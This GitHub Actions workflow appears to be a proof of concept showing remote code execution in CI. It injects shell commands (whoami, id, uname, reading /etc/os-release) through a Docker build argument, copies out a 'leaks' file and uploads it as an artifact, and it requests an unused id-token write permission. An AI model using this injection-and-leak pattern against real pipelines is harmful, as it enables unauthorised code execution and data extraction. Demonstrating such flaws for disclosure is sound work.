name: Safe CI RCE Demonstration

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  safe-ci-exploit:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      id-token: write

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4

      - name: Verify Docker Daemon Status # New diagnostic step
        run: |
          echo "Checking Docker daemon status..."
          docker info
          echo "---"
          echo "Listing running Docker containers..."
          docker ps -a
          echo "---"

      - name: Build Docker Image and Extract Leak
        run: |
          # The Dockerfile is now directly available at ./taskcluster/docker/python/Dockerfile
          docker build \
            -f ./taskcluster/docker/python/Dockerfile \
            --build-arg PAYLOAD_CMD="whoami && id && uname -a && cat /etc/os-release" \
            --build-arg MARKER="SAFE_CI_PROOF" \
            -t safeproof \
            ./taskcluster/docker/python # The build context

          docker run --rm safeproof cat /leaks.txt > leaks.txt

      - name: Upload Leak Artifact
        uses: actions/upload-artifact@v4
        with:
          name: safe-ci-leak-proof
          path: leaks.txt
